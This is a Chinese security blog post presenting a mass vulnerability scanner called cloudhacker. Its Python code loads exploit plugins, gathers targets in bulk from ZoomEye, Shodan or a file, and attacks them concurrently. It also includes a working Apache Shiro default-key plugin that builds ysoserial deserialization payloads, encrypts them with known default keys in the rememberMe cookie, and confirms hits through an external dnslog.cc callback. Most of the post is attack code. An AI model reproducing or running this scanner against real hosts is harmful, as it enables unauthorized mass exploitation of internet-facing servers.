文章来源:平头哥SEC
先上链接:
https://github.com/yuxiaokui/cloudhacker
然后上代码:
先是动态加载选择的exp,然后是导入攻击目标。
# 动态加载选择的漏洞利用代码
exp = importlib.import_module(‘exp.’ + host[int(target)-1] + ‘.’ + pocs[int(flag) – 1][:-3])
# 选择通过zoomeye还是shodan还是文件来导入目标
api_select = input(“Zoomeye or Shodan or File (z/s/f):”)
if api_select == ‘f’:
f = input(“File:”)
with open(f) as x:
targets = x.readlines()
else:
query = input(“Query:”)
start = int(input(“Start_page:”))
end = int(input(“End_page:”))
if api_select == ‘z’:
p = zoomeye(query, start, end)
if api_select == ‘s’:
p = shodan_api(query, start, end)
targets = p.run()
然后使用协程的方式进行批量检测。
def check(self):
while self.targets.qsize() > 0:
target = self.targets.get().strip()
try:
self.pbar.update(1)
result = exp.exp(target)
if result:
self.result.append(result)
except Exception as e:
#print(e)
pass
def run(self):
threads = [gevent.spawn(self.check) for i in range(self.threads_num)]
try:
gevent.joinall(threads)
except KeyboardInterrupt as e:
print (‘[WARNING] User aborted’)
for res in self.result:
print (res)
self.pbar.close()
print (“Hack it!”)
for res in self.result:
print (res)
print(“Found “,len(self.result))
print (“End!”)
没错就是这么简单的几十行代码,就可以实现一个漏洞扫描器。
其实关键的地方还是写漏洞检测插件。
这里给出一个最近比较火的Shiro使用默认key的检测方式。
import os
import re
import base64
import uuid
import time
import subprocess
import requests
from Crypto.Cipher import AES
from random import randint
JAR_FILE = ‘./lib/ysoserial.jar’ # 需要自己下载 https://github.com/frohoff/ysoserial
keys=”’
kPH+bIxk5D2deZiIxcaaaA==
4AvVhmFLUs0KTA3Kprsdag==
”’
def poc(url, rce_command,key):
if ‘://’ not in url:
target = ‘https://%s’ % url if ‘:443’ in url else ‘http://%s’ % url
else:
target = url
try:
payload = generator(rce_command, JAR_FILE,key)
r = requests.get(target, cookies={‘rememberMe’: payload.decode()}, timeout=10)
#print(key)
#print(r.status_code)
except Exception as e:
#print (e)
pass
return False
def generator(command, fp,key):
if not os.path.exists(fp):
print(‘Jar zai na ne ?’)
raise Exception(‘jar file not found!’)
popen = subprocess.Popen([‘java’, ‘-jar’, fp, ‘URLDNS’, command],
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS – len(s) % BS) * chr(BS – len(s) % BS)).encode()
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def exp(target):
for key in keys.split(‘\n’):
token = “shrio-” + str(randint(100000,999999))
dnslog = ‘http://’ + token + ‘.xxxxxx.dnslog.cc’ # 我在Chamd5的dnslog平台注册时地址。
dnslog_api = “http://admin.dnslog.cc/api/dns/xxxxxxxx/%s/” % token
poc(target, dnslog, key.strip())
time.sleep(3)
r = requests.get(dnslog_api)
if r.text != ‘False’:
return target,key.strip()
break
if __name__ == ‘__main__’:
exp(‘bhst.vip:20020’) # 这是我用docker搭建的靶机,用来验证漏洞0daybank
文章评论